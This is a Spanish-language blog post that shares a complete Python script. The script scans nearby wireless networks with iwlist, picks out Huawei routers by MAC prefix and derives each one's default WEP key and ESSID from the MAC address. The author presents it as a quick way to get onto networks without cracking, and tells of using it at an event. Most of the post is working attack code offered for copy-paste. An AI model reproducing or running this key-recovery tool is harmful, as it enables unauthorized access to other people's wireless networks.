Automatizando mac2wepkey para trabajar desde una terminal Linux

La idea de programar este script se debió principalmente a una anécdota en Pinotepa Nacional hace poco más de un año, la cosa es que había un router Huawei, pero el único cliente conectado estaba mediante cable, por lo que no había paquetes de datos válidos para romper la clave wep, así que algunos estaban intentando inútilmente inyectar paquetes en dicha red, cuando llegué al evento ya llevaban un buen rato con eso y no podían, por lo que hice uso de mi hermoso teléfono (en aquel entonces un i1 de Motorola) que bien equipado con Python, me permitió pronto conseguir la clave del router sin tener que descifrarla, hacer inyección de paquetes ni nada por el estilo, en aquel momento me di cuenta del potencial de esta herramienta considerando dos factores, por una parte una vez que Telmex se casa con un fabricante, inunda el mercado con roters de esa compañía, segundo la ventaja de no tener que hacer inyección porque además hay que decirlo estos son un poco más resistentes que otros a la inyección (¿irónico no?), después de eso automatice el proceso para que detectará todas las redes y mostrará solo las claves de los que eran huawei basado en su dirección MAC, sin embargo como por ahora no tengo un teléfono con Android, me ví en la necesidad de adaptar el script a una terminal para automatizar el proceso, hasta el momento no he empleado las librerías adecuadas de Python porque recuerdo que alguien me había comentado que había un par de ellas dedicadas exclusivamente al uso de las redes inalámbricas (por lo que si alguien sabe cuales son le agradecería me lo haga saber); lo que hice fue un tanto más primitivo pero igualmente valido, consistió en usar la librería "os" para ejecutar comandos de sistema y leer la respuesta, el comando a usar era desde mi perspectiva "iwlist interfaz scan" que nos da información sobre las redes detectadas, el inconveniente es que se necesita ejecutar como root, pero eso no debe representar un problema, así que para evitar caritas tristes hice una función que detecte el usuario, nuevamente apelando a la terminal, por último el script ejecuta un "iwlist interfaz scan | grep Cell" para generar una lista de las direcciones MAC, verifica si son huawei y en caso de que si obtiene la clave por defecto, espero que les sirva, en algunos casos lo único que se necesita es una conexión no especifica, así que eso podrá ayudarles, les dejo aquí mismo el código por si quieren descargarlo y abajo por si quieran hacer un copy/paste y finalmente en pastebin por si quieran incluirlo en algún otro sitio.

Antes de que lo olvide, la sintaxis de uso es python m2wkuvz.py (wlan0, wlan1, etc)


#!/usr/bin/env python
#-*- encoding: utf-8 -*-


# mac2wepkey Huawei HG520 by hochoa@websec.mx - 12/2010
# m2wkuvz (m2wkuvz ubuntu version) by hack@zosemu.com - 07/2012


import os, sys


def uso():
    os.system("clear")
    print "Uso: python", sys.argv[0], "Interfaz_Inalámbrica"


def hex2dec(s):
    return int(s, 16)


def es_huawei(macx):
    hard=["001882","001e10","0022a1","002568","00e0fc","04c06f","0819a6","1c1d67","202bc1","285fdb","286ed4","308730","404d8e","4c1fcc","4c5499","548998","54a51b","5c4ca9","6416f0","781dba","80fb06","84a8e4","cc96a0","F4c714"]
    for x in range(len(hard)):
        n=x
        if macx==hard[n]: return True; break
    return False


def wepkey(macz):
    i=0;mac=[]
    a0=0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
    a1=0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
    a2=0,13,10,7,5,8,15,2,10,7,0,13,15,2,5,8
    a3=0,1,3,2,7,6,4,5,15,14,12,13,8,9,11,10
    a4=0,5,11,14,7,2,12,9,15,10,4,1,8,13,3,6
    a5=0,4,8,12,0,4,8,12,0,4,8,12,0,4,8,12
    a6=0,1,3,2,6,7,5,4,12,13,15,14,10,11,9,8
    a7=0,8,0,8,1,9,1,9,2,10,2,10,3,11,3,11
    a8=0,5,11,14,6,3,13,8,12,9,7,2,10,15,1,4
    a9=0,9,2,11,5,12,7,14,10,3,8,1,15,6,13,4
    a10=0,14,13,3,11,5,6,8,6,8,11,5,13,3,0,14
    a11=0,12,8,4,1,13,9,5,2,14,10,6,3,15,11,7
    a12=0,4,9,13,2,6,11,15,4,0,13,9,6,2,15,11
    a13=0,8,1,9,3,11,2,10,6,14,7,15,5,13,4,12
    a14=0,1,3,2,7,6,4,5,14,15,13,12,9,8,10,11
    a15=0,1,3,2,6,7,5,4,13,12,14,15,11,10,8,9
    n1=0,14,10,4,8,6,2,12,0,14,10,4,8,6,2,12
    n2=0,8,0,8,3,11,3,11,6,14,6,14,5,13,5,13
    n3=0,0,3,3,2,2,1,1,4,4,7,7,6,6,5,5
    n4=0,11,12,7,15,4,3,8,14,5,2,9,1,10,13,6
    n5=0,5,1,4,6,3,7,2,12,9,13,8,10,15,11,14
    n6=0,14,4,10,11,5,15,1,6,8,2,12,13,3,9,7
    n7=0,9,0,9,5,12,5,12,10,3,10,3,15,6,15,6
    n8=0,5,11,14,2,7,9,12,12,9,7,2,14,11,5,0
    n9=0,0,0,0,4,4,4,4,0,0,0,0,4,4,4,4
    n10=0,8,1,9,3,11,2,10,5,13,4,12,6,14,7,15
    n11=0,14,13,3,9,7,4,10,6,8,11,5,15,1,2,12
    n12=0,13,10,7,4,9,14,3,10,7,0,13,14,3,4,9
    n13=0,1,3,2,6,7,5,4,15,14,12,13,9,8,10,11
    n14=0,1,3,2,4,5,7,6,12,13,15,14,8,9,11,10
    n15=0,6,12,10,9,15,5,3,2,4,14,8,11,13,7,1
    n16=0,11,6,13,13,6,11,0,11,0,13,6,6,13,0,11
    n17=0,12,8,4,1,13,9,5,3,15,11,7,2,14,10,6
    n18=0,12,9,5,2,14,11,7,5,9,12,0,7,11,14,2
    n19=0,6,13,11,10,12,7,1,5,3,8,14,15,9,2,4
    n20=0,9,3,10,7,14,4,13,14,7,13,4,9,0,10,3
    n21=0,4,8,12,1,5,9,13,2,6,10,14,3,7,11,15
    n22=0,1,2,3,5,4,7,6,11,10,9,8,14,15,12,13
    n23=0,7,15,8,14,9,1,6,12,11,3,4,2,5,13,10
    n24=0,5,10,15,4,1,14,11,8,13,2,7,12,9,6,3
    n25=0,11,6,13,13,6,11,0,10,1,12,7,7,12,1,10
    n26=0,13,10,7,4,9,14,3,8,5,2,15,12,1,6,11
    n27=0,4,9,13,2,6,11,15,5,1,12,8,7,3,14,10
    n28=0,14,12,2,8,6,4,10,0,14,12,2,8,6,4,10
    n29=0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3
    n30=0,15,14,1,12,3,2,13,8,7,6,9,4,11,10,5
    n31=0,10,4,14,9,3,13,7,2,8,6,12,11,1,15,5
    n32=0,10,5,15,11,1,14,4,6,12,3,9,13,7,8,2
    n33=0,4,9,13,3,7,10,14,7,3,14,10,4,0,13,9
    key=30,31,32,33,34,35,36,37,38,39,61,62,63,64,65,66
    ssid=[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f']
    while i<12:
        mac.insert(i,hex2dec(macz[i]));i=i+1
    s1=(n1[mac[0]])^(a4[mac[1]])^(a6[mac[2]])^(a1[mac[3]])^(a11[mac[4]])^(n20[mac[5]])^(a10[mac[6]])^(a4[mac[7]])^(a8[mac[8]])^(a2[mac[9]])^(a5[mac[10]])^(a9[mac[11]])^5
    s2=(n2[mac[0]])^(n8[mac[1]])^(n15[mac[2]])^(n17[mac[3]])^(a12[mac[4]])^(n21[mac[5]])^(n24[mac[6]])^(a9[mac[7]])^(n27[mac[8]])^(n29[mac[9]])^(a11[mac[10]])^(n32[mac[11]])^10
    s3=(n3[mac[0]])^(n9[mac[1]])^(a5[mac[2]])^(a9[mac[3]])^(n19[mac[4]])^(n22[mac[5]])^(a12[mac[6]])^(n25[mac[7]])^(a11[mac[8]])^(a13[mac[9]])^(n30[mac[10]])^(n33[mac[11]])^11
    s4=(n4[mac[0]])^(n10[mac[1]])^(n16[mac[2]])^(n18[mac[3]])^(a13[mac[4]])^(n23[mac[5]])^(a1[mac[6]])^(n26[mac[7]])^(n28[mac[8]])^(a3[mac[9]])^(a6[mac[10]])^(a0[mac[11]])^10
    ya=(a2[mac[0]])^(n11[mac[1]])^(a7[mac[2]])^(a8[mac[3]])^(a14[mac[4]])^(a5[mac[5]])^(a5[mac[6]])^(a2[mac[7]])^(a0[mac[8]])^(a1[mac[9]])^(a15[mac[10]])^(a0[mac[11]])^13
    yb=(n5[mac[0]])^(n12[mac[1]])^(a5[mac[2]])^(a7[mac[3]])^(a2[mac[4]])^(a14[mac[5]])^(a1[mac[6]])^(a5[mac[7]])^(a0[mac[8]])^(a0[mac[9]])^(n31[mac[10]])^(a15[mac[11]])^4
    yc=(a3[mac[0]])^(a5[mac[1]])^(a2[mac[2]])^(a10[mac[3]])^(a7[mac[4]])^(a8[mac[5]])^(a14[mac[6]])^(a5[mac[7]])^(a5[mac[8]])^(a2[mac[9]])^(a0[mac[10]])^(a1[mac[11]])^7
    yd=(n6[mac[0]])^(n13[mac[1]])^(a8[mac[2]])^(a2[mac[3]])^(a5[mac[4]])^(a7[mac[5]])^(a2[mac[6]])^(a14[mac[7]])^(a1[mac[8]])^(a5[mac[9]])^(a0[mac[10]])^(a0[mac[11]])^14
    ye=(n7[mac[0]])^(n14[mac[1]])^(a3[mac[2]])^(a5[mac[3]])^(a2[mac[4]])^(a10[mac[5]])^(a7[mac[6]])^(a8[mac[7]])^(a14[mac[8]])^(a5[mac[9]])^(a5[mac[10]])^(a2[mac[11]])^7
    alfa = "ESSID="+str(ssid[s1])+str(ssid[s2])+str(ssid[s3])+str(ssid[s4])+" - Wepkey="+str(key[ya])+str(key[yb])+str(key[yc])+str(key[yd])+str(key[ye])
    return alfa


def verifica(interfaz):
    m = os.popen("whoami").read()
    g = m[:4]
    n = os.popen("id -un").read()
    h = n[:4]
    usuario = m[0:len(m)-1]
    print "[+] Detección de usuario:", usuario
    if (m == n) and g == 'root' and h == 'root':
        print "[+] Escaneo iniciado con la interfaz", interfaz
        comando = "iwlist " + interfaz + " scan | grep Cell"
        hay = os.popen(comando).read()
        lista = hay.split("\n")
        encontradas = 0
        huaweii = 0
        encontradas = len(lista) - 1
        print "[+] Redes encontradas: ", encontradas
        if len(lista) > 0:
            for x in lista:
                y = x[-17:]
                if len(y) == 17:
                    macc = y.replace(':','')
                    macc = macc.lower()
                    huawei = es_huawei(macc[0:6])
                    if huawei:
                        huaweii += 1
                        z = wepkey(macc)
                        print "    * MAC=", y, "-",z
                    else:
                        print "    - MAC=",y, " No huawei!"
            print "[+] Huawei detectadas:", huaweii
        else:
            print "No se encontaron redes inalámbricas o no especifico adecuadamente la interfaz"
    else:
        print "[-] Es necesario ejecutar este script como root para poder emplearlo aplicación terminada."


if len (sys.argv) != 2:
    uso()
else:
    verifica(sys.argv[1])




Comentarios

Publicar un comentario

Tu opinión es importante compartela...

Entradas populares de este blog

Detener la sincronización de tiempo/fechas entre Host y Guest en Virtual Box

Imagen
Ésta es otra de esas entradas que surgieron a partir de una necesidad sencilla pero para la cual no hay mucha documentación y la que hay no es del todo clara. El problema en cuestión surge al intentar cambiar la fecha del sistema en nuestro SO huésped (virtualizado) y quedar frustrados tras varios intentos porque la fecha cambia después de unos segundos, esto se debe a que un servicio en concreto se encarga de hacerlo, éste servicio es parte de las "Guest Additions", suele ser de mucha ayuda, sin embargo en ocasiones conviene cambiar la fecha de nuestro sistema ya sea para registrar programas, alterar fechas de creación de documento, seguido de una larga lista de etcéteras. Para el caso de los huéspedes (Guests) Windows se llama "VboxService.exe" y se encuentra ubicado en la carpeta "System32"  y para los huéspedes Linux "vboxadd-timesync" y se encuentra instalado en "/etc/init.d". Asumiré que tienen instaladas las "Guest
Leer más

Extraer datos de un archivo.mdb (Access) con python

Luego de mucho tiempo fuera de línea, me decidí a escribir sobre algo que me pareció muy interesante, resulta que por azares del destino tuve que extraer la información de un archivo mdb y para colmo de males desde una MAC; al principio probé usar una herramienta llamada MDB Explorer , aunque su precio es accesible, la verdad es que me sentía un poco molesto de no poder hacerlo más a mi propio estilo, fue entonces que me puse a investigar como tener acceso al contenido de una base de datos de Access desde Python; encontré un par de librerías ( pyodbc y pypyodbc , de las cuales sólo funcionó la segunda al menos en MAC), pero aún no estaba satisfecho, fue entonces que por otro azar del destino encontré un scrip t que decía poder extraer el contenido de las tablas de una base de datos en formato CSV, luego de analizar el código de dicho script, me decidí a leer un poco más sobre el uso de la herramienta que en realidad hace el trabajo, fue así  que descubrí mbd-tools , así que sin más f
Leer más

Solución al problema con odbc pgsql (postgresql) en Windows 7 de 64 bits

Hace poco tuve que lidiar con la instalación de un driver ODBC para Postgresql desde Windows 7 (x64) la verdad es que normalmente no había tenido ningún problema para crear conexiones DSN, sin embargo por alguna extraña razón la versión "Home Basic" de este jodido sistema fue una piedrita en el zapato, como me dí cuenta de que es más común de lo que parece, decidí escribir este post a fin de compartir la solución con otros. El problema Según leí en la documentación en inglés, se deriva de que a "los genios de Microsoft" se les ocurrió dejar dos versiones del mismo programa encargado de generar los orígenes DSN ODBC (por aquello de las compatibilidades en el sistema) concretamente es un programa llamado "odbcad32.exe", hasta aquí tiene sentido y mi comentario sarcástico respecto al tema parece fuera de lugar (pero no uso el sarcasmo a la ligera), el problema es que la versión del programa de 32 bits esta alojada en la carpeta "C:\WINDOWS\SysWO
Leer más